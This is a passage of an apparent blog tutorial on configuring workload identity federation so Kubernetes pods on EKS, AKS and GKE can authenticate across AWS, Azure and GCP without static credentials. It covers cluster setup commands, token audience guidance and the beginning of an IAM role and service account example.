  Table of Contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
Prerequisites

&lt;ul&gt;
&lt;li&gt;Required Tools&lt;/li&gt;
&lt;li&gt;Cloud Accounts&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Cluster Setup

&lt;ul&gt;
&lt;li&gt;Cluster Cleanup&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;Why Use Workload Identity Instead of Static Credentials?&lt;/li&gt;

&lt;li&gt;How Workload Identity Federation Works&lt;/li&gt;

&lt;li&gt;

Understanding Token Flow Differences

&lt;ul&gt;
&lt;li&gt;Understanding Token Audience in Cross-Cloud Authentication&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Scenario 1: Pods Running in EKS

&lt;ul&gt;
&lt;li&gt;Architecture Overview&lt;/li&gt;
&lt;li&gt;1.1 Authenticating to AWS (Native IRSA)&lt;/li&gt;
&lt;li&gt;1.2 Authenticating to Azure from EKS&lt;/li&gt;
&lt;li&gt;1.3 Authenticating to GCP from EKS&lt;/li&gt;
&lt;li&gt;Scenario 1 Cleanup&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Scenario 2: Pods Running in AKS

&lt;ul&gt;
&lt;li&gt;Architecture Overview&lt;/li&gt;
&lt;li&gt;2.1 Authenticating to Azure (Native Workload Identity)&lt;/li&gt;
&lt;li&gt;2.2 Authenticating to AWS from AKS&lt;/li&gt;
&lt;li&gt;2.3 Authenticating to GCP from AKS&lt;/li&gt;
&lt;li&gt;Scenario 2 Cleanup&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Scenario 3: Pods Running in GKE

&lt;ul&gt;
&lt;li&gt;Architecture Overview&lt;/li&gt;
&lt;li&gt;3.1 Authenticating to GCP (Native Workload Identity)&lt;/li&gt;
&lt;li&gt;3.2 Authenticating to AWS from GKE&lt;/li&gt;
&lt;li&gt;3.3 Authenticating to Azure from GKE&lt;/li&gt;
&lt;li&gt;Scenario 3 Cleanup&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;Security Best Practices&lt;/li&gt;

&lt;li&gt;Production Hardening&lt;/li&gt;

&lt;li&gt;Performance Considerations&lt;/li&gt;

&lt;li&gt;Comparison Matrix&lt;/li&gt;

&lt;li&gt;Migration Guide&lt;/li&gt;

&lt;li&gt;

Conclusion

&lt;ul&gt;
&lt;li&gt;Final Cleanup&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;h2&gt;
  
  
  Prerequisites
&lt;/h2&gt;

&lt;p&gt;Before experimenting with the samples for cross-cloud authentication in this blog post, you'll need:&lt;/p&gt;

&lt;h3&gt;
  
  
  Required Tools
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;kubectl&lt;/code&gt; (v1.24+)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;aws&lt;/code&gt; CLI (v2.x) and &lt;code&gt;eksctl&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;az&lt;/code&gt; CLI (v2.50+)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;gcloud&lt;/code&gt; CLI (latest)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;jq&lt;/code&gt; (for JSON processing)&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Cloud Accounts
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;AWS account with appropriate IAM permissions&lt;/li&gt;
&lt;li&gt;Azure subscription with Owner or User Access Administrator role&lt;/li&gt;
&lt;li&gt;GCP project with Owner or IAM Admin role&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Cluster Setup
&lt;/h2&gt;

&lt;p&gt;This section provides commands to create Kubernetes clusters on each cloud provider with OIDC/Workload Identity enabled. &lt;strong&gt;If you already have clusters, skip to the scenario sections.&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# EKS Cluster (~15-20 minutes)&lt;/span&gt;
&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;AWS_PROFILE&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&amp;lt;your aws profile where you want to create the cluster&amp;gt;
eksctl create cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; my-eks-cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--region&lt;/span&gt; us-east-1 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--nodegroup-name&lt;/span&gt; standard-workers &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--node-type&lt;/span&gt; t3.medium &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--nodes&lt;/span&gt; 2 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--with-oidc&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--managed&lt;/span&gt;

&lt;span class="c"&gt;# AKS Cluster (~5-10 minutes)&lt;/span&gt;
&lt;span class="c"&gt;# azure login and select the subscription where you want to work&lt;/span&gt;
az login
az group create &lt;span class="nt"&gt;--name&lt;/span&gt; my-aks-rg &lt;span class="nt"&gt;--location&lt;/span&gt; eastus2

az aks create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; my-aks-rg &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; my-aks-cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--node-count&lt;/span&gt; 2 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--node-vm-size&lt;/span&gt; Standard_D2s_v3 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--enable-managed-identity&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--enable-oidc-issuer&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--enable-workload-identity&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--network-plugin&lt;/span&gt; azure &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--generate-ssh-keys&lt;/span&gt;

az aks get-credentials &lt;span class="nt"&gt;--resource-group&lt;/span&gt; my-aks-rg &lt;span class="nt"&gt;--name&lt;/span&gt; my-aks-cluster &lt;span class="nt"&gt;--file&lt;/span&gt; my-aks-cluster.yaml

&lt;span class="c"&gt;# GKE Cluster (~5-8 minutes)&lt;/span&gt;
gcloud auth login
gcloud config &lt;span class="nb"&gt;set &lt;/span&gt;project YOUR_PROJECT_ID

gcloud services &lt;span class="nb"&gt;enable &lt;/span&gt;container.googleapis.com

gcloud container clusters create my-gke-cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--region&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;us-central1 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--num-nodes&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--enable-ip-alias&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--workload-pool&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;YOUR_PROJECT_ID.svc.id.goog &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--release-channel&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;regular

&lt;span class="nv"&gt;KUBECONFIG&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;my-gke-cluster.yaml gcloud container clusters get-credentials my-gke-cluster &lt;span class="nt"&gt;--region&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;us-central1

&lt;span class="c"&gt;# Verify clusters, make sure your context is set to the newly created clusters&lt;/span&gt;
kubectl get nodes
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Cluster Cleanup
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Delete EKS&lt;/span&gt;
eksctl delete cluster &lt;span class="nt"&gt;--name&lt;/span&gt; my-eks-cluster &lt;span class="nt"&gt;--region&lt;/span&gt; us-east-1

&lt;span class="c"&gt;# Delete AKS&lt;/span&gt;
az group delete &lt;span class="nt"&gt;--name&lt;/span&gt; my-aks-rg &lt;span class="nt"&gt;--yes&lt;/span&gt; &lt;span class="nt"&gt;--no-wait&lt;/span&gt;

&lt;span class="c"&gt;# Delete GKE&lt;/span&gt;
gcloud container clusters delete my-gke-cluster &lt;span class="nt"&gt;--region&lt;/span&gt; us-central1 &lt;span class="nt"&gt;--quiet&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Why Use Workload Identity Instead of Static Credentials?
&lt;/h2&gt;

&lt;p&gt;Traditional approaches using static credentials (API keys, service account keys, access tokens) have significant drawbacks:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Security risks&lt;/strong&gt;: Credentials can be leaked, stolen, or compromised&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Rotation complexity&lt;/strong&gt;: Manual credential rotation is error-prone&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Audit challenges&lt;/strong&gt;: Difficult to track which workload used which credentials&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compliance issues&lt;/strong&gt;: Violates principle of least privilege&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Workload identity federation solves these problems by:&lt;/p&gt;

&lt;p&gt;✅ &lt;strong&gt;No static credentials&lt;/strong&gt;: Tokens are automatically generated and short-lived&lt;br&gt;&lt;br&gt;
✅ &lt;strong&gt;Automatic rotation&lt;/strong&gt;: No manual intervention required&lt;br&gt;&lt;br&gt;
✅ &lt;strong&gt;Fine-grained access control&lt;/strong&gt;: Each pod gets only the permissions it needs&lt;br&gt;&lt;br&gt;
✅ &lt;strong&gt;Better auditability&lt;/strong&gt;: Cloud provider logs show which Kubernetes service account made the request&lt;br&gt;&lt;br&gt;
✅ &lt;strong&gt;Standards-based&lt;/strong&gt;: Uses OpenID Connect (OIDC) for trust establishment&lt;/p&gt;
&lt;h2&gt;
  
  
  How Workload Identity Federation Works
&lt;/h2&gt;

&lt;p&gt;All three cloud providers use a similar pattern based on OIDC trust:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbeowdoaz4ubox51nhxgc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbeowdoaz4ubox51nhxgc.png" alt="workload identity federation" width="800" height="495"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The flow:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Pod requests a service account token from Kubernetes&lt;/li&gt;
&lt;li&gt;Kubernetes issues a signed JWT with claims (namespace, service account, audience)&lt;/li&gt;
&lt;li&gt;Pod exchanges this JWT with the cloud provider's IAM service&lt;/li&gt;
&lt;li&gt;Cloud provider validates the JWT against the OIDC provider&lt;/li&gt;
&lt;li&gt;Cloud provider returns temporary credentials/tokens&lt;/li&gt;
&lt;li&gt;Pod uses these credentials to access cloud resources&lt;/li&gt;
&lt;/ol&gt;


&lt;h2&gt;
  
  
  Understanding Token Flow Differences
&lt;/h2&gt;

&lt;p&gt;While all three providers use OIDC federation, their implementation details differ:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Cloud Provider&lt;/th&gt;
&lt;th&gt;Validates OIDC Directly?&lt;/th&gt;
&lt;th&gt;Uses STS/Token Service?&lt;/th&gt;
&lt;th&gt;Mechanism&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;AWS&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes (STS validates OIDC)&lt;/td&gt;
&lt;td&gt;Yes (AWS STS)&lt;/td&gt;
&lt;td&gt;AssumeRoleWithWebIdentity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Azure&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes (Entra ID validates OIDC)&lt;/td&gt;
&lt;td&gt;Yes (Azure AD token endpoint)&lt;/td&gt;
&lt;td&gt;Federated credential match → access token&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;GCP&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes (STS validates via WI Pool)&lt;/td&gt;
&lt;td&gt;Yes (GCP STS)&lt;/td&gt;
&lt;td&gt;External account → STS → SA impersonation&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Key Differences:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;AWS&lt;/strong&gt;: Direct OIDC validation via STS, returns temporary AWS credentials (AccessKeyId, SecretAccessKey, SessionToken)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Azure&lt;/strong&gt;: Entra ID validates OIDC token against federated credential configuration, returns Azure AD access token (OAuth 2.0 bearer token)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GCP&lt;/strong&gt;: Two-step process - STS validates via Workload Identity Pool, then impersonates service account to get access token&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fss52zfawvryzshvywc4e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fss52zfawvryzshvywc4e.png" alt="token flow differences" width="800" height="495"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  Understanding Token Audience in Cross-Cloud Authentication
&lt;/h3&gt;

&lt;p&gt;When authenticating from one cloud provider to other cloud providers, you must configure the token audience claim correctly. Each cloud provider has specific requirements:&lt;/p&gt;
&lt;h4&gt;
  
  
  Token Audience Best Practices
&lt;/h4&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Source Cluster&lt;/th&gt;
&lt;th&gt;Target Cloud&lt;/th&gt;
&lt;th&gt;Recommended Audience&lt;/th&gt;
&lt;th&gt;Why&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;AKS&lt;/td&gt;
&lt;td&gt;Azure (native)&lt;/td&gt;
&lt;td&gt;Automatic via webhook&lt;/td&gt;
&lt;td&gt;Native integration handles this&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AKS&lt;/td&gt;
&lt;td&gt;AWS&lt;/td&gt;
&lt;td&gt;&lt;code&gt;sts.amazonaws.com&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;AWS best practice for STS&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AKS&lt;/td&gt;
&lt;td&gt;GCP&lt;/td&gt;
&lt;td&gt;WIF Pool-specific or custom&lt;/td&gt;
&lt;td&gt;GCP validates via WIF configuration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;EKS&lt;/td&gt;
&lt;td&gt;AWS (native)&lt;/td&gt;
&lt;td&gt;Automatic&lt;/td&gt;
&lt;td&gt;Native IRSA integration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;EKS&lt;/td&gt;
&lt;td&gt;Azure&lt;/td&gt;
&lt;td&gt;&lt;code&gt;api://AzureADTokenExchange&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Azure federated credential requirement&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;EKS&lt;/td&gt;
&lt;td&gt;GCP&lt;/td&gt;
&lt;td&gt;WIF Pool-specific&lt;/td&gt;
&lt;td&gt;GCP standard&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GKE&lt;/td&gt;
&lt;td&gt;GCP (native)&lt;/td&gt;
&lt;td&gt;Automatic&lt;/td&gt;
&lt;td&gt;Native Workload Identity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GKE&lt;/td&gt;
&lt;td&gt;AWS&lt;/td&gt;
&lt;td&gt;&lt;code&gt;sts.amazonaws.com&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;AWS best practice&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GKE&lt;/td&gt;
&lt;td&gt;Azure&lt;/td&gt;
&lt;td&gt;&lt;code&gt;api://AzureADTokenExchange&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Azure requirement&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;h4&gt;
  
  
  Approach 1: Dedicated Tokens per Cloud (Recommended for Production)
&lt;/h4&gt;

&lt;p&gt;Use separate projected service account tokens with cloud-specific audiences:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Advantages:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;✅ Follows each cloud provider's best practices&lt;/li&gt;
&lt;li&gt;✅ Clearer audit trails (audience claim shows target cloud)&lt;/li&gt;
&lt;li&gt;✅ Better security posture (principle of least privilege)&lt;/li&gt;
&lt;li&gt;✅ Easier troubleshooting (explicit token-to-cloud mapping)&lt;/li&gt;
&lt;li&gt;✅ No confusion about which cloud a token is for&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Implementation:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-token&lt;/span&gt;
    &lt;span class="na"&gt;projected&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;sources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;serviceAccountToken&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-token&lt;/span&gt;
            &lt;span class="na"&gt;audience&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;sts.amazonaws.com&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-token&lt;/span&gt;
    &lt;span class="na"&gt;projected&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;sources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;serviceAccountToken&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-token&lt;/span&gt;
            &lt;span class="na"&gt;audience&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api://AzureADTokenExchange&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-token&lt;/span&gt;
    &lt;span class="na"&gt;projected&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;sources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;serviceAccountToken&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-token&lt;/span&gt;
            &lt;span class="na"&gt;audience&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;//iam.googleapis.com/projects/PROJECT_NUMBER/...&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Approach 2: Shared Token (Acceptable for Testing/Demos)
&lt;/h4&gt;

&lt;p&gt;Reuse a single token with one audience for multiple clouds:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Use Case:&lt;/strong&gt; Simplifying demos or when managing multiple projected tokens is impractical&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Limitations:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;⚠️ Violates AWS best practices when using Azure audience&lt;/li&gt;
&lt;li&gt;⚠️ Less clear in audit logs&lt;/li&gt;
&lt;li&gt;⚠️ Potential security concerns in highly regulated environments&lt;/li&gt;
&lt;li&gt;⚠️ May not work in all scenarios (some clouds reject non-standard audiences)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;This guide uses Approach 1 (dedicated tokens) for all cross-cloud scenarios to demonstrate production-ready patterns.&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Scenario 1: Pods Running in EKS
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; After completing this scenario, make sure to clean up the resources using the cleanup steps at the end of this section before proceeding to the next scenario to avoid resource conflicts and unnecessary costs.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Architecture Overview
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl6qs7yb67e04erov49jr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl6qs7yb67e04erov49jr.png" alt="eks" width="800" height="495"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  1.1 Authenticating to AWS (Native IRSA)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Setup Steps:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1. Create IAM OIDC provider (if not exists), in our case eks cluster was created with OIDC provider; hence no need&lt;/span&gt;

&lt;span class="c"&gt;# 2. Get OIDC provider URL&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;aws eks describe-cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; my-eks-cluster &lt;span class="nt"&gt;--region&lt;/span&gt; us-east-1 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"cluster.identity.oidc.issuer"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--output&lt;/span&gt; text | &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s2"&gt;"s/^https:&lt;/span&gt;&lt;span class="se"&gt;\/\/&lt;/span&gt;&lt;span class="s2"&gt;//"&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# 3. Create IAM role trust policy&lt;/span&gt;
&lt;span class="nv"&gt;YOUR_ACCOUNT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;aws sts get-caller-identity &lt;span class="nt"&gt;--query&lt;/span&gt; Account &lt;span class="nt"&gt;--output&lt;/span&gt; text&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; trust-policy.json &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt;
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;YOUR_ACCOUNT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;:oidc-provider/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;:sub": "system:serviceaccount:default:eks-cross-cloud-sa",
          "&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;:aud": "sts.amazonaws.com"
        }
      }
    }
  ]
}
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;&lt;span class="c"&gt;# 4. Create IAM role&lt;/span&gt;
aws iam create-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role-name&lt;/span&gt; eks-cross-cloud-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--assume-role-policy-document&lt;/span&gt; file://trust-policy.json

&lt;span class="c"&gt;# 5. Attach permissions policy&lt;/span&gt;
aws iam attach-role-policy &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role-name&lt;/span&gt; eks-cross-cloud-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--policy-arn&lt;/span&gt; arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Kubernetes Manifest:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Submit the manifest below to validate the Scenario 1.1, if authentication is working you will see success logs as shown below -&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# scenario1-1-eks-to-aws.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ServiceAccount&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;eks-cross-cloud-sa&lt;/span&gt;
